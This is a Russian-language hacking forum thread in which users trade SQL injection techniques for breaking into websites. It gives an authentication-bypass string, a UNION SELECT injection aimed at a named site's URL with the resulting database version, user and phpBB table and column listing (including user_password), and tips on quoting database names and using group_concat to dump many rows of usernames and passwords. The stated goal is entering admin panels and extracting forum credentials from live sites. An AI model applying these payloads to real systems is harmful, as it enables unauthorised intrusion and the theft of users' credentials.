Выдаёт вот такую ошибку Всё получилось ))) Спасибо лови от меня + Вот как надо было admin' or '1'='1' -- and password И можно описание данного кода? именно вот этого куска: admin' or '1'='1' -- Ладно в админку то я попал.. но это было не особо гланым... Как вытащить пароль из базы? Заранее спасибо)
Мда, после -- пробел должен быть, в первом запросе ты его не поставил, во втором он есть, вот и сработало.
Помогите вот с этой инъекцией: Нашел колонки из этой таблицы, ввожу, а пишет что таблицы - нет. Что не так делаю?
А как можно поменять бд в запросе? Вот ошибка такая: Т.е. нет таблицы. Что посоветуете сделать? Если я правильно понял, то в этой таблице логины и пассы от форума, мб не та бд. Что делать?
http://www.bdva.ru/arhiv.phtml?id=-146+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11-- Version = 5.0.77-log User = [email protected] Database = bdva Code: Database:bdva-forum information_schema bdva [COLOR=Red]bdva-forum[/COLOR] Tables:phpbb_users phpbb_auth_access phpbb_banlist phpbb_categories phpbb_config phpbb_confirm phpbb_disallow phpbb_forum_prune phpbb_forums phpbb_groups phpbb_posts phpbb_posts_text phpbb_privmsgs phpbb_privmsgs_text phpbb_ranks phpbb_search_results phpbb_search_wordlist phpbb_search_wordmatch phpbb_sessions phpbb_sessions_keys phpbb_smilies phpbb_themes phpbb_themes_name phpbb_topics phpbb_topics_watch phpbb_user_group phpbb_users phpbb_vote_desc phpbb_vote_results phpbb_vote_voters phpbb_words Columns: Table phpbb_users user_active username user_password user_session_time user_session_page user_lastvisit user_regdate user_level user_posts user_timezone user_style user_lang user_dateformat user_new_privmsg user_unread_privmsg user_last_privmsg user_emailtime user_viewemail user_attachsig user_allowhtml user_allowbbcode user_allowsmile user_allowavatar user_allow_pm user_allow_viewonline user_notify user_notify_pm user_popup_pm user_rank user_avatar user_avatar_type user_email user_icq user_website user_from user_sig user_sig_bbcode_uid user_aim user_yim user_msnm user_occ user_interests user_actkey user_newpasswd user_login_tries user_last_login_try
Спс! Все пашет! Скажите, а как вы узнали другую бд? И почему при "bdva-forum.phpbb_users" ошибка, а "`bdva-forum`.phpbb_users" все ок?
Потому что MySQL неправильно (для тебя) интерпретирует символ "-", а обрамив название БД кавычками ты ей даешь знать, что именно это - имя базы.
CyberHunter, все что тебе может пригодиться(или почти все) всегда лежит в текущей бд, а текущую бд узнаешь в самом начале с помощью database()
Откуда такая уверенность? Приведу пример (у меня біл реально такой случай). Был сайт, какие-то объявления. Здесь же была скуля. На этом же сайте же сайте был форум, таблицы которого находилась в отдельной БД, а в текущей - только таблички новостей. Так что не факт, что на сайте используется только одна основная БД.
От чего зависит, когда при иньекции скрипт начнет сливать всю информацию из таблицы, а когда - по одной строке(придется использовать лимиты)? Для понятности вопроса имеем, к примеру, иньекцию с полем 2, которое выводится: PHP: http://site.com/user.php?id=-1+UNION+SELECT+1,2,3-- При PHP: http://site.com/user.php?id=-1+UNION+SELECT+1,username,3-- будет получена только 0 строка из таблицы. Чтобы получить остальные данные, придется использовать лимит, но выводится будет все равно только одна строка. Есть ли способы во втором случае сливать более чем одну строку за запрос?
использовать group_concat(username) А одна строка потому что в скрипте строка mysql_fetch_row не в цикле, а вызывается один раз
Nek1t, да. Есть ф-ция group_concat, но её использование ненадежно, т.к. она имеет лимит вывода - 1000 символов.
можно получать больше 1000 символов если использовать такою конструкцию union+select+1,group_concat(username),3+from+table+where+username>'последнего полученного_значения' т.к. результат сортируется по алфавиту
ИМХО самое нужное в той теме - это чтобы при просмотре таблиц не включать information_schema(ИМХО лучше всего получать таблицы вообще по базам) и то что выводится по алфавиту
